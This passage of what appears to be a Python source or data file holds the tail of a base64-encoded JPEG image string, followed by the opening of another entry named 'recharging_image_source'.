IRIFMQYAIhNBUQcyYRRxCEKBI5EVUqFiFjMJsSTB0UNy8BfhgjQlklMYY0TxorImNRlUNkVkJwpzg5NGdMLS4vJVZXVWN4SFo7PD0+PzKRqUpLTE1OT0laW1xdXl9ShHV2Y4doaWprbG1ub2Z3eHl6e3x9fn90hYaHiImKi4yNjo+DlJWWl5iZmpucnZ6fkqOkpaanqKmqq6ytrq+v/aAAwDAQACEQMRAD8A3+Pfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvdf/Q3+Pfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvdf/R3+Pfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3XvfuvddEgAkkAAXJPAAH1JP4A9+691Fo6+hyCPLQVtJXRxyNFJJR1MNSiSobPE7wu6rIh+qnke/de6l+/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de6//0t/j37r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3RaOyO/6rGbibrbqDar9o9oEIK+ipq6Gi2psuGaORochvfPjzDHozJZKWGOatlvdYtAZl917pKf7Lr2H2JG9Z3n3bvKrWrQPJsvq3I1PXu1MY12YJDkcXINy17xq2lnlqgr2uEW9vfuvdVGfND+YV8dP5ce4KbEdGdodkdz9s4LMUS756KO9Mnv7ADDVc8VNWLuHc2fbIf3Tz9PAxloqOnqDVVbppFO45X3XuqIPmr/M0+fPzczZ2XjOxW6k6lyGKmza9L/HTL1+O3w2GEqo1b3F2ZJjWixmPhjiaX+HQVlK9RHZX8eu3v3Xurmf5Yn8yb4H/HDYe2fjpXZfsjZe5dyZWHNbv7B7c35treFBuDe+VpKGjrctk8zQZ2aLaceQ+0BgoZKWhCxRMyxW9Te691s8RyRzRxyxOkkUqLJHIjB0kjdQyOjKSrIykEEcEe/de65+/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuv/T3+Pfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3RYOzd9bs3tuqTpPqCu/h2YFMs/YnYUapLB19iJzCY6HHXYrNvLMU0jGlQpJFToPLKLeNJfde6FTYuwNjdMbRnoMJDT4nGUcdVl9w57IzI1flKvQ1TlM/uLLz2mrq2oYNLNPMxJJPPv3XuqA/nr/NWyu7KTO9ZfGjOT7e2L91Vbf3d3TRR6sjkInkfG1FHsxZU8mPgr6mXwU1cY3mrHuKRbFKge
691RfktrdWdebU/jGegiauqKrKVeM24hir96bizTzTJktwbzzmWppqag1zqZJUJqViYMXBkQn37r3QMUm6sWuwc3trrjr+Ha+ErZ0ze8Mjgsvloq3cn8PnqZZlnyOc+7lLZCWQRvUyDVCD5VUSGGH37r3RbO2sNh+zzR5LdNBiIaLD7h200bxY1K9XWOtSmTC4KDLWmjw9PTJMK7P5JpKipk1pTqwidvfuvdfSM+JuVyOb+M3ROWyrLJWV3Vmy6gzLIZRPA+BojSz+QvKW8tNoNyzE/k+/de6ML7917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de6//U3+Pfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+690ld87gXamztz7kPP8FwmRyCD+stPTSNDf+o8un37r3QZ/HTZv90+ssRV1pNRuTeD1G8d1ZCV5ZZ67ObglevqS8szNKYKUTCGBCdMUCIi2VR7917qlT+cR8zsnV/xT4ldPZUVM1NQUld3xX43Ipj3pMdk3CYjr+TIu0KUwzUWuoyjo5NPj4nVxeRVb3XutW/sLf8ASdQ7Nn3Pl6gb13Vk8xS4mmw2BNWcJFn6iphjpWip6TRLR4SihK/bR3NVPFZzoDoF917o3/Xf8vP+Y58iIcfub/ZSg2BjNMcDX7z7LwmyYs3HTAtr3DQ1rR5SixVSxjdKSAQuiixfVcj3Xuhe7l/lJ/OXanVe4Oxe09xfHL4z9dbcalzO8n/vnuTetKpasjpaeSsbFQUsUmMjnqtKwSyywxLM5sPqPde6BLvD+RX83cd1A/yHy/yb6+7C6fpWwm99x9Y/HzEVdO25dh0c9PPPNjMpWUyruGvqaFzUN53nQmJRIxRF8fuvdbtXw3h2TTfFvoql66qcpU7Mpetdr02COcqxW5inpIMZBH9nkpwz/wCWUjqUdb+krbgce/de6Mv7917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de6//V3+Pfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+690F/dMSz9V74p2sVqcHNSkEBgfuZYYALG4NzJ7917p2r8tFs7rt8oFjX+B7UWanhI0pJPRYnXBDpUcB5IgDxwLn37r3WhTSdnUG7+z959ib9ydUma33uTsDP5mLKzO1Pm/v8APV1J/HpImbwSYnF4TAgUwa50qoPpNm917oqG1toQdrd9bJ3AswqNtt8gesI6ONopYpMpjcx2HtfbFI6RRLHBLQor62Uq1m9RNz7917rc57v218t/g/tTHdx9C7lpO4OmNk5HeO6u4uiM7t8SbpymA3Xuubc+T3BsfcWPmpauPObSo8hUolNMslPUwxoCocFm917qxjY+7uqfld0bht1UNHj97dV9t7TWaTGZrHeWiyeIytOYq3G5PG10QIeJy8UsbrdXUj6j37r3QCdHb7+Efx9yeG+DnVfaOzaPcmDlzcmF6dqt1VG5c3jYc1W5HceQxMP3prBFRwSVU7x0by/5PF6AoUAe/de6TXXNLT/HX5kZXpDA3ousO+ti7g7e2btuGHx4vam9dr5vGY/sClxKqPBR0W4f7y0VYtMmlROlRIo9bW917qw737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691//1t/j37r3Xvfuvde9+691737r3Xvfuvde9+691737
r3Xvfuvde9+691737r3Xvfuvde9+691737r3QRbx766d2FuLGbP3X2LtXFbvzVTSUeJ2nLmKNtyZGprqhKWlipMMkrV0rzTyACyf717917pRdmYupzewd0UFEpeqlxT1FPH+ZZaGSKvSK1jcymm02tzf37r3Rdu4N8U+7OkKqfA1bxxZnrLeMqS07eOejzlRt6o27h4NLL5Ip6XcFeAwK+kpz9PfuvdfOi3rjodp0GDwu5cbkdu5jZmUl6vzj68hVZ/ee5Ytxzxbipo6GULM8tfVRMIpLiP7bQFVyxA917qwXb/XG+emu5+r+4t+9XdjvsTZ2X6u3DuHE1e29x7fpOrts4bedBl2zWdFdRmmrFztZi1+3kLKqCKNAeZmi917rfu2bu3avZuy8DvHa+Rxu49pbvwtJlcVkKOWCux2SxmSp1ljZJIzJDNE8cliOf6H37r3Vdf8wjI/IPE7A2b0D8R9tVm2JuzZ8ti92732lhSZtibYaJRJSbcjpBBjcVntwSzyItRUNDFBEruriTT7917om/xM/km4XYtVguwe8d55Gp3pjMrTbjpaXa2QrKbLR5GM+VpdxbyeRMtkZtbuzJB9sv7jI7Si7H3Xuh93/wBk0u9f5kfXO4G3Pjdn9O/FTr7d+BzWZronqqvsfsPf9FBFJtfbiU8jVVRR7YoaKGSpljhmRqgeMMGB0+690dvM/I/duXFJUdMdIb37Ox8U5GZr8iItg0kdICy+TDT7lSJ8tUEi4QRoCv8Aavx7917qJT/Izt+KqgizPxC7fo6SRj5q7E5zZGfWmQDUWelgy9JWSMQDZURiTYfn37r3SqqPlN11jz4szhOy8JWIgNRRZHrrcwnpn0hmikamo6mnZ0+hKuy8fX37r3XLqL5Z9F947z3L1713u2XKbz2hj6bKbh2/WYbLYqtx1BWSvBT1En39JDC6vKhWysWB+oHv3XujI+/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r//X3+Pfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3TPuGTJQ4DOTYaNZcxFh8nJiYm/TJkkop2oY2uQNL1QQHn8+/de6oy+IOy8xvztzpOryXU+9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VpqzF0FLlvt4RT/sQpF409Kj37r3Vlnv3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de6//09/j37r3Xvfuvde9+691737r3XvfuvdYZ6inpY/LUzw08WpU8k8qQx63OlF1yMq6mY2A+pPv3XuswN+RyDyCPz7917oEO5aSvpZuvt6UtBWZOi2Lu3+L5uix1LJW15xNXjqrH1FXS0kIMs7UJmEjKoLFAbAnj37r3QV7Hxm4O/sdLvmv7C3BjMKm7KyOl2ZHgKWDDQ0uByJWjDLkUNZUVEyxq5qAVIZjpAtx7r3RwlFgBe9gBf8ArYfX8+/de679+691737r3XvfuvdF/wCxd45nH7oOCyG55OtNpNjYHg3b/BEygzOQqWCz0MOTqFahwMtEh4aRWLkgji/v3Xun3alT1FtszZCi3ttrKZivVWr9x5jduKyWbr7i4E1bPWaoYf6RRiONf9T7917rluLv7p7bLeGu37gayueNngxWAqf7yZar0/7rpcdglyFTNKT+Avv3XukT0lQV+7dz777e3Lhc9QVebyv8I2Iu5qCfF1lBsOlhikpUo8TVEVOOSvrHkll8iJK72uCqoffuvdGX9+691GrJ5KalqKiGmlrJYYZJI6WEqJah0UssMZchA8hFhc2v7917oGM/Ae5tpb26x3jsTc+28RurbmTwtTWV5pno56evp3gJirKKdmgqI2YMoIBuOPfuvdB78Matqfpag2KSky9T5rN9
XwV8dRVVS5Gl2bXzYekq2nrZp5mnamp1Eg1EBwQPfuvdP3eHxywHatXjd6YHJVvXXcO14ZRtDtTa0FEmex3kZJXxmYhngeHcW3Kt4wJ6Gq1xMOV0OFdfde6JLvXqPuHsLsHaeN7W6Bwm5dwtQybf3p3TtfN4ul2NuHZsNPMPPk9r5Eybhxu4Ulnd6WBTVpBK7WlKMxPuvdJ1u4t6b4yuN+Mfx56ypo969YGTF5bevZtTRbV2Psyi12xcjbUoamfNbzzkOPEcsIpY4aWdAH+7j1Ae/de6MRtf4Cbf3JlqPeXyn7F3b8md2U+ialwW7Kg4vqPbsg0OINvdY4uSLATR0sy3hqcktdXKP93fX37r3R7sFtvb22KOPHbcweJwNDFHHFHSYjH0mOp1jhQRxL46WKJSI0AAvew9+6907FGvcTSD/abRW/3mPVx/r+/de64mOX8TsP8AkCM/9E+/de67Cyi37oP+vGBf/bEe/de65AP+WBH/AAX/AI37917rmL/nn/ePfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3XF2Ki4Vm/qFtq/2ANr+/de66V9QB0Ot/wAMACP9exPv3Xuufv3Xuve/de6//9Tf49+691737r3Xvfuvde9+690HXZu9cjsHb0WeoMEucQZSgo65Ja9cdDQUdZMIXr56gwVJSGF2FzoIW92sLke690BHaG1Mx2HhKus7i3Vj9n9bxvDW4jZm2p2nymZykCGbEzZDclLVLUZIpVmOWGkooYy7oLkqSPfuvdDV0vU7nqeuNuLu6iraPMUlM9A0mSstbkqOjcw0GXqILBqSTI0irIYm9aXseffuvdCl7917r3v3Xuve/de697917r3v3Xuve/de6wVNLS1sElLWU0FXTSrplp6mGOeCVT/ZkilV43X/AAIPv3Xug8rum+qMlP8Ac1vXWzpZ73Mg2/joSx/q4ggjWQn+rAn37r3SlxGzNn7fZXwO1duYWRAAsuKwmNoJQALf5ylpopP959+690pffuvde9+691737r3UPILUPQVyUjaat6OpWmb/AFNQ0LiFvz9JCPfuvdEy+ANRTTfH5IfDLHnKDsftbHbvlmVg1bu+g7C3FS7jyCM3MkFblYpZI2+hjYW49+690dk/4G3+Pv3XuuDxRyW1orW/qL+/de6Iz8rtg7o2RXYn5VdNYyeo7A6soag752liVMbdq9Xq8FTn9tzUkbRw124cTT0xqsPI4LxTo0SssdRLq917ob9oS7Y7w2ht7tPYnZW9027vXDUWew8+39xqmL+3yNLHPEI6Goo6mKIxCSzx8aWBBsR7917p0j6jyThhW9udqzeq6Cjz9FjwFIsVYrjJ5G/1wy29+691i2d0lRbLyVVkqTsnuDNvWVFRUzUm6N+1edx+uovdUpKmkCJHDf8AbA/zY4Fhx7917oThi8jEW8GdrAp+i1NPTVRA/wCDOik/7x7917qRDS5WORWlyyTxg+qNsfFGWFiLCSOUaSDzex9+6904gS/lkP8AyCf+K+/de65jV/at/sL/APEk+/de679+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvdf/V3+Pfuvde9+691737r3XvfuvdR6ukpa+mnoq6mgrKSpjaKopqmJJoJo2/UksUisjqf6Ee/de6DrCdP9fbfzCZvG4MLWQMz0EdVW11dRYl3DB2xNFWVE9NjiwYj9tVsOBYe/de6E337r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3XCRtMbsSFCqWZm/SFUXYn+g0j37r3RFP5eVXUV/R+562pLO1R3x8gjFI7FzJTx9x70ip3DFm1I0KLb8W9+690cbe28dvde7Q3JvndeRp8RtvaeFyOfzeSq5Ehp6PHYullq6qaSRyqgLFEf9c+/de6qnxfZnZHdGU2
R2D8jd2bt6K6D7X+5fqfa2zamu2vUxFMk527L2nviER12Iyu6sP4Kmlo43hiSRmiZ5JCqj3Xurb6GnojiqWkgm+/oPsoqaOaaYVhq6YQiINNOSRUGaP9TH9Vz7917quPq6on+HnyPyvQ+YkaHoXv7MZLefQ+Smdlodm9hV0tRkN8dUMzJ4aajyUpOVw6F7uZaqFQqxRq3uvdWW+/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917rG0eo31yL/grBR/vVz7917rmBYAXJt+Sbk/65/r7917rv37r3Xvfuvdf/9bf49+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3WKeeCmieapmip4Yxd5Z5EiiQf1eSQqij/XPv3XuuNNVU1bBHVUdRBV00oJiqKaVJ4ZAGKkxyxsyOAwI4P1Hv3Xuqat99v7Y7f7o+SO1O4fkX2V0VsTpHfVNsKj2xsHcE2BXd+Gi2zi9w7gy+VbH46vzf2ix5dFlqqVoHpY9JEiajf3XujA9Y/Lb4DdH9d4HYPU3a2Hzm28RHO+Pxe0juPf8AuCsqMjUyV9dX10lNSZDL5PJ5GtqnnnlmZ5pZZCWJJ9+690DHeffeF+au5envjB1vtTuKk2HvzftPme7dybp6g7A2ZgH642RBJuSTbS5vcmBocVU0+9cvQ01BPG0mmWillUXLKPfuvdWqbh2Fs7dm06jY25tuYjObSqseuLqMDkaGCpxslCsIgWnNLIjRBEjFlAHptx7917omT9F9/fHueSu+Mu8IN+bAWZ55eiu2s1Xzx0EDSPK9NsTsKo+/y2FjjVyIqStWrpgAscZgQC3uvdBR3R3P1T8jeus90d3jhd1/GDt95aHI7ErOyqBMdTYDsPDV0eR2juTZnYGPeu2jlauhzFFFMscNa0pj9MsYDFT7r3Qs/B/NfI3PDtOp743dit3UmMz2JwO1a/A0cVNt2aTH4mBs1U7bmH+VV+GapnWITz2eaohlkVURkRfde6Pz7917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuv/9ff49+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691ByYyRoKoYd6JMmYiKJ8kk8lCs1xY1KUzxztGFvwpBv7917ooXZXSHfm8/JuKl7noKPO4ulkfA7QpNuQwbLqK5ZLw/xSSqlqa6eJ4mIfWrAm3Fh7917on26Pjp8+N9Zf8AgFRuHY+N23RRU5i3Fnd65mhxr1JXyTSYPY2xKUQ0iwTn0/dMbm5tz7917qsHfHxk/mtbQ7K7PyPSuBx+O3JuFqvbuQ7ZwWzcZNlNxUJjp6Zc3T5Df0mQNbLPSUcEbSXp2kjp4kb0Roo917pD5zbH897pnrCpjbI09RjsY0MtRvrcOE6ho92yTVJ0vF95tTG5XOQQoxOgRIxH0uPfuvdEG7X7N/naZmXF4TMdjfL+po8tBLI7dT4jc9dhit9AWbJUseLkDf6lQnCm/v3Xui152L+Zf0vNQ1u4d/8AzW2y28DJHOu5V7IxVZnnp2RpoKUtVMZlHkAcrYgML/g+/de6xTbd/madj1ER27sf5h72hdopEyI/0p1siSqymIxGsqYILfQi7WB/2F/de6N91v8ADf8Amh9kmep3zs/+YPhdwZWGDCRZSs3FjKDb0FFLGsEU1dR7q3bQyNjaXUGlTxuSqkKb+/de62zf5c/x772+M3Tb9Yd07pxu82oKmKrwmfWqqajOzmpRnrYMojVNVRU8FO9hCsTcC9+eT7r3VhPv3Xuve/de697917r3v3Xuve/d
e697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de6//0N/j37r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3USooKGreKSroqSqkgOqB6imhmeFv9VE0iM0Z/xFvfuvdSwLcDgDgAfj37r3Xvfuvde9+691737r3Xvfuvde9+691737r3Rdvlx2buXpj4yd59r7Oippt09e9bbm3XgYq2B6mkkyWHoJKumSpp45IZJoC6epQ6kj8j6+/de6kb7+Q3XvSfx2rfkX3Hnv7v9f7V2Njt47wz1NQV2V+yoZqSlkmnp8djIKqvrWeaoASOGN3YsAAffuvdIzsn5abU66338W8BPh6vL7K+U2er9qbT7CoqiJcXidxvtOp3jtajyNLKqymm3Ti8dUpDKCNE6ohBLi3uvdCFXfJLo6mz24Nm0nZ+yMpv3bm3czueu2JQbkxk26v4VghOtfOMQk71gihqKdonbQQjgg/Q+/de6Ih8s/nHgKT4e9a9s7B3pjdib17c3F0tkdo7ZrM3i33VUbf3NvbbY3DBDQEiarjg27Vzmd1iCrEGY2APv3Xuj21PyK6fxW78L1nPvfG5HsTJQY1jtPCifN5uijr0tT1uYpcZFUHEUMro371R4oxYkkAe/de6Cjs/b+L6u7h3l8s9+dnbmqtp7B6TnpMR1HjsnVpjcZDhqrJ5Xee74tuU1XHDuHK5WkmpIVeaGQ0ophoZfI3v3Xugwwv8zTonOdp4/YFNh95x7SykW56PH9zTUFGnWdduzZm2G3hunZtDkmrBXVmXwmEhlaoljgakjngkhMolRlHuvdSJ/wCYrsujyPWGTyXT/beG6g7Wze39u7f7wzVFtzG7Kgy276yXHbThr8dPnf71xU+4Mh4IYZhQmIPVRayo1lPde6sQVldVdGDI6hlYG4ZWF1YH8gg+/de65e/de697917r3v3Xuv/R3+Pfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3SI7K2Pi+y+vt69fZqJZsTvPbGZ23XxuLo1Nl6Cajk1C4uB5b/AFH09+691Snu3a3yG716C2J/Ll3v05vejrqLN7V2Z3L3Lkaal/0b5fpfYWTo56jceFzAqJP4jl+wcdjIqaPHqv3FJJUSNKoSMM3uvdKvrj4T/LeTfXxe6e7YyXXNd8Yfhh2BV9hdc9iY/cWVyPZ/Z1Nh9uZLbXWWz91bYqMNTUOAfatNm5JK2ujrqg1bUFPoUeaVY/de6HHZ/wDLO27gO7Z+yszv583tPE5PtXPbI2vFtvH43cONzXcCZWLczbm3jTt95ufGYyDM1EWNpnijWnjZfIZWRWHuvdAx17/KL2dt/wCKncvR+aptsSdtbkxm4do9d9/ymv3HvPH7VoK5cl1ea2ozZmqcMdpyU1LE9BSTfZM1OZY1TyeNPde6wdL/AAe/mB9IYWsyvUHyX6R2XuPfOTrd19h7a7a6Yqu5oqXd2XnarzKbZ7B23u7rPclbtxquRlokycdTUU1KEiJIRffuvdHAw3xV7V3vW0W7/kh2ttfeO+arpPsLpvdNH13s7IbU6/yEO9solRBuHE4HO5/cVfjq6gxtNDDKj1EwnkUuCgsg917oFKv4e/Fj4nfB/Yey/kLu6Wv2f8dcFueobtatjmxuZqtzdgYjNbVz2ajxWONU+Rzu5v71zwU9EoqHnqZ41QPLo9+691Qz2P2/iO6ewfhr8YMBmfl9371bivkN1hJiuvazo9+oaI7H2fkIq2j3bvLI
5auwm783iNkSwwVM0n2VLRvFEWl1OUD+691t0Z6g7mXJ7zTaeW2LSbdbYNNSddU2VxuUnyuP7CiXJrPW7lqY6kU1bthkNEI4YUSoVkmLMwZAvuvdB9V4X5b1fX/UVPR746hw/ZNBuTFT92ZGTaWaym3NwbVjpqtcxj9i0n8VpKjB5eoqmgeKepNRGiq6lPUGX3XujOqGCqGN2CgMRxdrcm3Frn37r3XL37r3X//S3+Pfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3XvfuvdJXe2xtn9k7Xy+yd/bbw+7tpZ+mNHmtu56ihyGKyVKWD+GrpJ1aOVA6gi44IBHPv3Xug36n+M3x/6Kmranp/qHYnXlXkVCV9btrBUtDXVaC1o567S9XJGLCyl9IsOPfuvdDl7917r3v3Xuve/de697917r/9k=
""",
"recharging_image_source": """
